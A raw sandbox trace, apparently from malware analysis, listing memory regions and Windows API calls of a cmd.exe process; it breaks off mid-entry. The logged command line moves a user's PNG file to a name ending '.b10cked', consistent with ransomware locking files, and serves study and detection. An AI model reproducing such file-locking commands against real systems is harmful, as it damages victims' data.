"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34352 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34353 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 34354 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34581 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34582 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34583 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34584 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 34585 start_va = 0x730000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 34586 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34587 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34588 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34589 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34590 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34591 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34592 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34593 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34594 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34689 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 34690 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34691 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34692 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34693 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34694 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34695 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34696 start_va = 0x320000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 34697 start_va = 0x540000 end_va = 0x6a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 34698 start_va = 0x740000 end_va = 0x133ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Thread: id = 845 os_tid = 0x9c8 [0231.853] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24ff5c | out: lpSystemTimeAsFileTime=0x24ff5c*(dwLowDateTime=0xbdbf5a40, dwHighDateTime=0x1d440a9)) [0231.853] GetCurrentProcessId () returned 0x8cc [0231.853] GetCurrentThreadId () returned 0x9c8 [0231.853] GetTickCount () returned 0x3fcc5 [0231.853] QueryPerformanceCounter (in: lpPerformanceCount=0x24ff54 | out: lpPerformanceCount=0x24ff54*=28864195061) returned 1 [0231.853] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.853] __set_app_type (_Type=0x1) [0231.853] __p__fmode () returned 0x76b331f4 [0231.854] __p__commode () returned 0x76b331fc [0231.854] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.854] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.854] GetCurrentThreadId () returned 0x9c8 [0231.854] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c8) returned 0x38 [0231.854] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.854] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.854] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.920] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.920] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24feec | out: phkResult=0x24feec*=0x0) returned 0x2 [0231.920] VirtualQuery (in: lpAddress=0x24ff23, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.921] GetConsoleOutputCP () returned 0x1b5 [0231.923] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.924] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.936] GetEnvironmentStringsW () returned 0x4501c8* [0231.936] FreeEnvironmentStringsW (penv=0x4501c8) returned 1 [0231.936] GetEnvironmentStringsW () returned 0x4501c8* [0231.937] FreeEnvironmentStringsW (penv=0x4501c8) returned 1 [0231.937] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee5c | out: phkResult=0x24ee5c*=0x40) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x0, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x1, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x1, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x0, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x40, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x40, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x40, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegCloseKey (hKey=0x40) returned 0x0 [0231.937] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee5c | out: phkResult=0x24ee5c*=0x40) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x40, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x1, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x1, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x0, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x9, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x9, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x9, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.938] RegCloseKey (hKey=0x40) returned 0x0 [0231.938] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.938] srand (_Seed=0x5b8863bf) [0231.938] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"" [0231.938] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"" [0231.938] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.938] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x451928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.938] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.939] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.939] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.939] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.939] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.939] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.939] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.939] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.939] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.939] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.939] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.939] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.939] GetEnvironmentStringsW () returned 0x452318* [0231.939] FreeEnvironmentStringsW (penv=0x452318) returned 1 [0231.939] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.939] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.939] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.939] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.939] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.939] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.939] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.939] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.939] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.939] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.940] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.940] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fc28, lpFilePart=0x24fc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fc24*="Desktop") returned 0x18 [0231.940] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.940] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f9a4 | out: lpFindFileData=0x24f9a4) returned 0x450058 [0231.940] FindClose (in: hFindFile=0x450058 | out: hFindFile=0x450058) returned 1 [0231.940] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f9a4 | out: lpFindFileData=0x24f9a4) returned 0x450058 [0231.940] FindClose (in: hFindFile=0x450058 | out: hFindFile=0x450058) returned 1 [0231.940] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f9a4 | out: lpFindFileData=0x24f9a4) returned 0x450058 [0231.941] FindClose (in: hFindFile=0x450058 | out: hFindFile=0x450058) returned 1 [0231.941] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.941] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.941] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.941] GetEnvironmentStringsW () returned 0x452b38* [0231.941] FreeEnvironmentStringsW (penv=0x452b38) returned 1 [0231.941] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.942] GetConsoleOutputCP () returned 0x1b5 [0231.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.978] GetUserDefaultLCID () returned 0x409 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fd68, cchData=128 | out: lpLCData="0") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fd68, cchData=128 | out: lpLCData="0") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fd68, cchData=128 | out: lpLCData="1") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.983] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.984] GetConsoleTitleW (in: lpConsoleTitle=0x440910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.005] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.005] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.005] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.005] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.006] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.006] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.006] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.006] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.006] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.006] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.006] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.010] GetConsoleTitleW (in: lpConsoleTitle=0x24fa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.058] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.058] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.058] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.058] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.058] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.058] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.058] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.058] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.058] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.058] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.058] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.058] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.058] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.058] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.058] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.058] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.058] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.058] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.058] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.058] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.058] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.058] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.058] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.059] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.059] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.059] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.059] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.059] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.059] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.059] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.060] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.060] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.060] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.060] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.060] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.062] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.062] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.062] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f81c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f814, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f814*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", 